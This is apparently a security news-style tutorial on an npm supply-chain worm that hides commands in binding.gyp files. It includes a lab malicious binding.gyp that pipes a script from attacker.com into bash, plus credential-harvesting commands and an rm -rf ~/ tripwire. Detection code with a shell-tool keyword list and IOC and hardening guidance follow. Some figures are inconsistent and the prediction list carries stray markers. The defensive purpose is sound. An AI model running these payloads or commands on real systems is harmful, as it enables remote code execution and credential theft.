Shai-Hulud Rises Again: 23 npm Packages Infected in Devastating Supply Chain Attack—Are Your CI/CD Pipelines Next?

Introduction

A sophisticated new variant of the infamous Shai-Hulud malware, dubbed “Miasma,” has resurfaced in the npm ecosystem, compromising at least 23 packages through a developer account takeover. This latest iteration leverages a highly evasive technique known as “Phantom Gyp,” which abuses the normally benign `binding.gyp` file to trigger malicious code execution silently during npm install—bypassing traditional security controls that only scan `package.json` scripts. With over 320 infected repositories already identified on GitHub and a self-propagating worm that steals credentials, cloud secrets, and CI/CD tokens, this attack represents one of the most significant supply chain threats of 2026.

Learning Objectives

  • Understand the mechanics of the “Phantom Gyp” attack vector and how it evades conventional npm security defenses.
  • Identify indicators of compromise (IOCs) and learn how to detect malicious `binding.gyp` files and obfuscated payloads.
  • Implement defensive measures to harden CI/CD pipelines, rotate compromised credentials, and prevent worm propagation.

1. The Phantom Gyp Technique: How Malware Hides in Plain Sight

The Miasma variant’s most dangerous innovation is its use of the `binding.gyp` file—a configuration file used by `node-gyp` to compile native Node.js add-ons. When a package contains a `binding.gyp` file and no custom `preinstall` or `install` scripts in `package.json`, npm automatically invokes `node-gyp rebuild` during installation. This process parses the `binding.gyp` file and can execute arbitrary shell commands via the `<!(...)` command-expansion syntax.

Attackers exploit this by embedding malicious commands directly into the `binding.gyp` file. The executed payload then downloads a Bun runtime, steals credentials, and exfiltrates data to a GitHub dead-drop repository. This technique is particularly insidious because most security tools and developer training focus on scrutinizing `package.json` lifecycle scripts, leaving `binding.gyp` largely unchecked.

Step‑by‑step guide to understanding and simulating the attack:

To fully grasp the attack chain, security professionals can simulate the “Phantom Gyp” technique in a controlled lab environment:

  1. Create a malicious `binding.gyp` file: The attacker creates a `binding.gyp` file in the package root with commands that execute during the build process.
    {
      "targets": [
        {
          "target_name": "evil",
          "sources": [ "evil.c" ],
          "conditions": [
            ["OS=='linux'", {
              "cflags": [
                "<!(curl -s http://attacker.com/payload.sh | bash)"
              ]
            }]
          ]
        }
      ]
    }
    

  2. Trigger execution during npm install: When a victim runs npm install, `node-gyp rebuild` executes, and the command in the `cflags` directive runs the attacker’s payload.

  3. Payload deployment: The initial command often downloads a second-stage payload, such as a Bun runtime, to avoid detection.

    curl -fsSL https://bun.sh/install | bash
    

  4. Credential harvesting: The malware then uses the GitHub CLI to extract tokens and enumerate repositories.

    gh auth token
    

  5. Data exfiltration: Stolen credentials and environment variables are sent to an attacker-controlled GitHub repository via authenticated API requests.

Detection commands (Linux/macOS):

  • Scan for suspicious `binding.gyp` files containing command execution patterns:
    find . -name "binding.gyp" -exec grep -l "<!(" {} \;
    
  • Monitor for unexpected `node-gyp` invocations or Bun runtime downloads in CI/CD logs:
    grep -E "node-gyp|bun install|curl.*bun" /var/log/syslog
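
The grep above flags every `<!(`, including the header lookups that ordinary native add-ons use. This added example (not code from the original article, npm or node-gyp) extracts each command expansion, separates well-known benign lookups from download-and-run patterns, and records whether npm would trigger the build implicitly. The allow-list, the suspicious-token list, the function names and the sample file are assumptions made for illustration.

```javascript
const fs = require('fs');
const path = require('path');
// binding.gyp is a Python-style literal, not strict JSON, so scan the raw text.
// Returns the command inside each <!(...) or <!@(...) expansion, tracking nested parentheses.
function commandExpansions(gypText) {
  const found = [];
  const opener = /<!@?\(/g;
  while (opener.exec(gypText) !== null) {
    const start = opener.lastIndex;
    let depth = 1, i = start;
    for (; i < gypText.length && depth > 0; i++) {
      if (gypText[i] === '(') depth++;
      else if (gypText[i] === ')') depth--;
    }
    const end = depth === 0 ? i - 1 : i; // an unterminated expansion runs to end of file
    found.push(gypText.slice(start, end).replace(/\\"/g, '"').trim());
  }
  return found;
}

// Assumption: header lookups commonly used by nan / node-addon-api projects; extend for your tree.
const KNOWN_BENIGN = [/^node -[pe] "require\('(node-addon-api|nan)'\)(\.[a-z_]+)?"$/i];
// Downloaders, shells, decoders, command chaining and URLs do not belong in a build configuration.
const SUSPICIOUS = /\b(curl|wget|bash|sh|base64|eval|powershell)\b|[|;&`]|https?:\/\//i;

function classify(cmd) {
  if (KNOWN_BENIGN.some((re) => re.test(cmd))) return 'benign';
  return SUSPICIOUS.test(cmd) ? 'suspicious' : 'review';
}

// Audit one package directory; returns null when it has no binding.gyp.
function auditPackage(dir) {
  const gypPath = path.join(dir, 'binding.gyp');
  if (!fs.existsSync(gypPath)) return null;
  const pkg = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
  const scripts = pkg.scripts || {};
  return {
    name: pkg.name,
    // npm falls back to `node-gyp rebuild` only when neither script is defined.
    implicitRebuild: !scripts.install && !scripts.preinstall,
    findings: commandExpansions(fs.readFileSync(gypPath, 'utf8')).map((cmd) => ({ cmd, verdict: classify(cmd) })),
  };
}

// Constructed sample: one benign header lookup and one download-and-run expansion.
const SAMPLE_GYP = `{ "targets": [ { "target_name": "addon",
  "include_dirs": [ "<!@(node -p \\"require('node-addon-api').include\\")" ],
  "cflags": [ "<!(curl -s http://example.invalid/payload.sh | bash)" ] } ] }`;
```

Call `auditPackage` on every directory under `node_modules` after an `npm install --ignore-scripts`, and treat any `suspicious` or `review` finding as a reason to read the file before building.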
    

2. Credential Harvesting and Worm Propagation

Once executed, the Miasma malware initiates a multi-stage credential theft and propagation routine. It systematically scans the compromised environment for GitHub access tokens, package registry authentication tokens, npm tokens, and cloud service credentials (AWS, GCP, Azure). The malware then validates these stolen credentials and enumerates accessible repositories and services.

Critically, the worm uses the stolen maintainer credentials to publish new malicious versions of legitimate packages. This self-propagating capability allows the attack to spread rapidly across the software supply chain, infecting downstream consumers and CI/CD pipelines. The malware also plants backdoor configurations inside AI coding assistant directories (e.g., Cursor, Copilot), ensuring persistence even after the malicious package is removed.

Step‑by‑step guide to detecting and mitigating credential theft:

  1. Audit GitHub and npm tokens: Immediately revoke any tokens that may have been exposed.
    # Show the authentication state and account for each known GitHub host
    gh auth status
    # Remove the locally stored credential; revoke the token itself in the GitHub UI
    gh auth logout
    

  2. Rotate cloud credentials: For AWS, GCP, and Azure, rotate all access keys and service principal credentials from a clean, isolated machine.

  3. Scan for unauthorized package publications: Check npm and GitHub for unexpected package versions published by your organization.

    # List all versions of a package
    npm view <package-name> versions --json
    

  4. Check for AI assistant backdoors: Inspect AI configuration directories for unauthorized modifications.

    # Check Cursor IDE settings
    grep -iE "backdoor|malicious" ~/.cursor/settings.json
    

  5. Monitor for `rm -rf ~/` tripwires: The worm contains a destructive tripwire that wipes the home directory if a decoy token is touched. Ensure endpoint detection and response (EDR) tools are monitoring for this command.
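
One way to carry out step 3 across many packages, as an added example that is not part of the original article: it compares the publish timestamps returned by `npm view <package-name> time --json` with the releases your team actually cut, and reports bursts of publishes. The package names, timestamps, release lists and function names are constructed for illustration.

```javascript
// Keys in the output of `npm view <package-name> time --json` that are not versions.
const META_KEYS = new Set(['created', 'modified']);

// Versions on the registry that are missing from the list of releases the team cut
// (assumption: that list comes from your own release tags or changelog).
function unexpectedVersions(time, released) {
  const known = new Set(released);
  return Object.entries(time)
    .filter(([key]) => !META_KEYS.has(key) && !known.has(key))
    .map(([version, published]) => ({ version, published }));
}

// Clusters of at least minCount publishes, across all packages, that fall within
// windowMs of the first publish in the cluster.
function publishBursts(timeByPackage, windowMs, minCount) {
  const events = [];
  for (const [name, time] of Object.entries(timeByPackage)) {
    for (const [version, iso] of Object.entries(time)) {
      if (!META_KEYS.has(version)) events.push({ id: `${name}@${version}`, at: Date.parse(iso) });
    }
  }
  events.sort((a, b) => a.at - b.at);
  const bursts = [];
  let cluster = [];
  const flush = () => { if (cluster.length >= minCount) bursts.push(cluster.map((e) => e.id)); };
  for (const ev of events) {
    if (cluster.length && ev.at - cluster[0].at > windowMs) { flush(); cluster = []; }
    cluster.push(ev);
  }
  flush();
  return bursts;
}

// Constructed sample data: hypothetical packages, timestamps and release lists.
const SAMPLE_TIME = {
  '@example-org/alpha': {
    created: '2024-01-10T09:00:00.000Z', modified: '2026-03-02T03:10:00.000Z',
    '1.0.0': '2024-01-10T09:00:00.000Z', '1.1.0': '2025-06-01T12:00:00.000Z',
    '1.1.1': '2026-03-02T03:10:00.000Z',
  },
  '@example-org/beta': {
    created: '2025-02-01T10:00:00.000Z', modified: '2026-03-02T03:14:00.000Z',
    '2.0.0': '2025-02-01T10:00:00.000Z', '2.0.1': '2026-03-02T03:14:00.000Z',
  },
};
const SAMPLE_RELEASED = { '@example-org/alpha': ['1.0.0', '1.1.0'], '@example-org/beta': ['2.0.0'] };
```

A version that is both unexpected and part of a burst spanning several packages is the pattern to escalate first: unpublish or deprecate it and rotate the publishing token.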

3. The Compromised Packages and Scale of the Attack

The initial wave of the attack targeted 23 npm packages under the “leo” namespace, including [email protected], [email protected], [email protected], and various connector packages for MySQL, PostgreSQL, Elasticsearch, and MongoDB. The attackers used the GitHub repository description “Alright Lets See If This Works” as a marker, with over 320 infected repositories already identified.

However, this is just the tip of the iceberg. Subsequent waves have compromised over 281 malicious package versions across the npm ecosystem, including high-profile packages such as `@vapi-ai/server-sdk` (~408,000 monthly downloads) and `ai-sdk-ollama` (~120,000 monthly downloads). The campaign also affected 32 packages under the legitimate `@redhat-cloud-services` namespace, demonstrating that this is not a typosquatting attack but a direct compromise of trusted maintainer accounts.

Detection and response commands:

  • Check for affected packages in your `package-lock.json` or `yarn.lock`:
    grep -E "leo-sdk|leo-cli|leo-auth|leo-connector|@vapi-ai|ai-sdk-ollama|autotel|awaitly" package-lock.json
    
  • Verify package integrity using npm audit:
    npm audit --production
    
  • Use Snyk or Socket to scan for obfuscated payloads:
    snyk test --all-projects
    

4. Evasive Execution and Obfuscation Techniques

The Miasma malware employs multiple layers of obfuscation to evade detection. The initial payload is heavily obfuscated using `eval()` and ROT-based decoding techniques. Sensitive strings are protected behind a bespoke encryption routine that derives keys using PBKDF2-HMAC-SHA-256 with 200,000 iterations, followed by multiple SHA-256-seeded permutation and XOR stages.

Furthermore, the malware generates a uniquely encrypted payload for each infection, using an AES-128-GCM key that changes with each upload location on GitHub. This makes hash-based indicators of compromise (IOCs) useful only for a specific package version, significantly complicating detection and version tracking.

Step‑by‑step guide to analyzing obfuscated payloads:

  1. Extract the malicious `index.js` file: Locate the oversized root `index.js` file (often > 100KB) in the compromised package.

  2. De-obfuscate using static analysis tools:

    # Use a tool like js-beautify to format the code
    js-beautify index.js > index-deobfuscated.js

  3. Identify XOR encryption loops: Search for common XOR patterns in the de-obfuscated code.

    // Look for patterns like:
    for (var i = 0; i < data.length; i++) {
      data[i] ^= key[i % key.length];
    }

  4. Extract the AES key: Search for hardcoded or derived keys using PBKDF2.

    // Look for crypto.pbkdf2 or similar functions
    crypto.pbkdf2(password, salt, 200000, 32, 'sha256', callback);

  5. Decrypt the payload: Use Node.js to replicate the decryption routine and extract the final payload.

5. Defensive Measures and Hardening Strategies

Organizations must adopt a multi-layered defense strategy to protect against the Miasma and similar supply chain attacks.

Immediate Actions:

  • Rotate all credentials from a clean machine before touching the compromised environment.
  • Remove affected packages and treat impacted environments as potentially compromised.
  • Revoke and rotate all npm, GitHub, AWS, GCP, and Azure tokens.

Long-term Hardening:

  • Disable `node-gyp` where possible, or use the `--ignore-scripts` flag during installation in high-risk environments.
    npm install --ignore-scripts
    
  • Implement registry cooldown windows and verify SLSA provenance signatures to limit package tampering.
  • Scan for `binding.gyp` files containing command execution patterns in your CI/CD pipelines.
  • Use dependency scanning tools like Snyk, Socket, or Sonatype that detect obfuscated payloads and credential stealers.
  • Monitor for unexpected Bun runtime downloads, oversized root `index.js` files, and creation of new GitHub repositories by CI-issued tokens.

Windows-specific commands:

  • Use PowerShell to scan for malicious `binding.gyp` files:
    Get-ChildItem -Recurse -Filter "binding.gyp" | Select-String -SimpleMatch "<!("
    
  • Check for unauthorized npm package versions:
    npm view <package-name> versions --json
    

What Undercode Say:

  • Key Takeaway 1: The “Phantom Gyp” technique represents a paradigm shift in npm supply chain attacks, rendering traditional `package.json` script scanning obsolete. Security teams must expand their detection scope to include `binding.gyp` and other build-time configuration files.

  • Key Takeaway 2: The Miasma campaign validates a new threat model where compromised developer credentials are weaponized to propagate self-replicating worms across the software supply chain, with attackers now targeting cloud identities and AI coding assistants for persistent access.

Analysis:

This attack is not an isolated incident but part of a broader trend of sophisticated supply chain compromises targeting the npm ecosystem. The use of per-infection encryption and multiple obfuscation layers indicates a mature threat actor with significant resources. The pivot to targeting AI coding assistants is particularly concerning, as it allows the malware to persist even after the malicious package is removed. Organizations must adopt a zero-trust approach to their CI/CD pipelines, treating every `npm install` as a potential security boundary. The speed of the attack—over 286 malicious versions published in under two hours—underscores the need for automated, real-time threat detection and response capabilities.

Prediction:

  • -1 The Miasma attack will accelerate the adoption of software bill of materials (SBOM) and SLSA provenance requirements across the industry, but not before several more major supply chain incidents occur.
  • -1 Attackers will increasingly target AI coding assistant configuration files as a persistence mechanism, leading to a new class of “AI-assisted” supply chain attacks that are even harder to detect.
  • +1 The open-source community will respond by developing new tooling specifically designed to detect and block binding.gyp-based attacks, similar to how `npm audit` was developed in response to earlier supply chain threats.
  • -1 The underground market for developer credentials will continue to grow, with threat actors specializing in account takeover and credential resale, making developer accounts a primary attack vector.
  • +1 Organizations will implement more rigorous access controls and multi-factor authentication (MFA) for developer accounts, reducing the risk of account compromise—but this will take time to deploy across all ecosystems.

Reported By: Hexploit Breaking – Hackers Feeds